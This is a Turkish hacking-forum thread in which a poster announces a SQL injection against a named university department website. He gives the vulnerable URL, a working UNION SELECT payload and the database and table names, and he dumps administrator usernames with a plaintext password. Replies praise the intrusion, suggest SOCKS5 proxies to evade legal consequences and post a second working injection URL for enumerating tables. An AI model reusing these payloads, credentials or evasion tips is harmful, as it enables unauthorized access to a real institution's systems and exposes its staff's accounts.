

ITÜ Mysql İnjection-Makine
-
İşim düştü itü'nün sitesine girdim. Php?id= görünce dayanamadım. Çektim tabloları işte :) İtü öğrencileri olabilir tbtde umarım işlerine yarar :P Hadi kolay gelsin
root domain : itu.edu.tr
atck domain : mkn.itu.edu.tr // itu.edu.tr ile aynı makinada rootlanabilirvuln link : http://www.mkn.itu.edu.tr/makina_personel_detay_ac.php?id=-1
vuln : http://www.mkn.itu.edu.tr/makina_personel_detay_ac.php?id=-1+and+1=0+ Union Select 1 , UNHEX(HEX([visible])) ,3,4,5,6,7,8,9,10,11,12,13,14--
database : mknweb
tables :adminuser
anasayfa_duyuru
anasayfa_duyuru_eng
bolum_duyuru
bolum_duyuru_eng
derskat
dersler
dersler_eng
hocalaradmin table : adminuser
columns :
user
pass
levelafter dump-
user:pass:level:
hakan:12qwasZX:-1:
bulent:12qwasZX:-1: -
Holyzone bu işte marka oldun artık hocam. Tebrikler, başarılı buldum...
Kurcalayacak arkadaşları uyaralım, fazla uğraşmayın itü şikayetçi fln olursa sql injection yapan bütün iplere dava açarlar. Suçsuz olsanız bile kapınıza dayanırlar.
Socks5 ile bağlanın rahatınıza bakın.
-
Allura bunu yazdı:
-----------------------------
Holyzone bu işte marka oldun artık hocam. Tebrikler, başarılı buldum...
Kurcalayacak arkadaşları uyaralım, fazla uğraşmayın itü şikayetçi fln olursa sql injection yapan bütün iplere dava açarlar. Suçsuz olsanız bile kapınıza dayanırlar.
Socks5 ile bağlanın rahatınıza bakın.
-----------------------------Sağol uyarın için. Fakat bişey yapabileceklerini zannetmiyorum. Yaş 17 olduğu için ip bile gizlemiyorum :D
Tabi diğer müridler alluranın dediği gibi proxy kullanmasında fayda var. -
Böle bir konunun sansasyon yaratması gerekirken, müridler bu işe tepkisiz kaldı. Bir iki kanala mail atalım :)
-
Ben vuln da yazan url yi yazdım syntax error verdi : | pek anlamam
-
Tebrikler HolyZone güzel iş :D
-
Mr_Dark bunu yazdı:
-----------------------------
Ben vuln da yazan url yi yazdım syntax error verdi : | pek anlamam
-----------------------------teknik terim biraz o böyle dene
http://www.mkn.itu.edu.tr/makina_personel_detay_ac.php?id=-1+and+1=0+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14+from+information_schema.tables--
table_name tableler için
column_name columnlar için -
Anlamam dedim ya işte :|
-
Mr_Dark bunu yazdı:
-----------------------------
Anlamam dedim ya işte :|
-----------------------------anla diye özel link çıkarttım anla artık :D
-
HoLyZone bunu yazdı:
-----------------------------
Allura bunu yazdı:
-----------------------------
Holyzone bu işte marka oldun artık hocam. Tebrikler, başarılı buldum...
Kurcalayacak arkadaşları uyaralım, fazla uğraşmayın itü şikayetçi fln olursa sql injection yapan bütün iplere dava açarlar. Suçsuz olsanız bile kapınıza dayanırlar.
Socks5 ile bağlanın rahatınıza bakın.
-----------------------------Sağol uyarın için. Fakat bişey yapabileceklerini zannetmiyorum. Yaş 17 olduğu için ip bile gizlemiyorum :D
Tabi diğer müridler alluranın dediği gibi proxy kullanmasında fayda var.
-----------------------------
iş güzel de yorumun abest :) 17 yaşındakileri de bilişim suçundan öperler :)15 yaşını doldurduğun için suç işleme ehliyetine sahip bi insansın sen artık :)
-
Addict bunu yazdı:
-----------------------------
HoLyZone bunu yazdı:
-----------------------------
Allura bunu yazdı:
-----------------------------
Holyzone bu işte marka oldun artık hocam. Tebrikler, başarılı buldum...
Kurcalayacak arkadaşları uyaralım, fazla uğraşmayın itü şikayetçi fln olursa sql injection yapan bütün iplere dava açarlar. Suçsuz olsanız bile kapınıza dayanırlar.
Socks5 ile bağlanın rahatınıza bakın.
-----------------------------Sağol uyarın için. Fakat bişey yapabileceklerini zannetmiyorum. Yaş 17 olduğu için ip bile gizlemiyorum :D
Tabi diğer müridler alluranın dediği gibi proxy kullanmasında fayda var.
-----------------------------
iş güzel de yorumun abest :) 17 yaşındakileri de bilişim suçundan öperler :)15 yaşını doldurduğun için suç işleme ehliyetine sahip bi insansın sen artık :)
-----------------------------yok hoca tecrübeliyim merak etme bişey olmuyor :)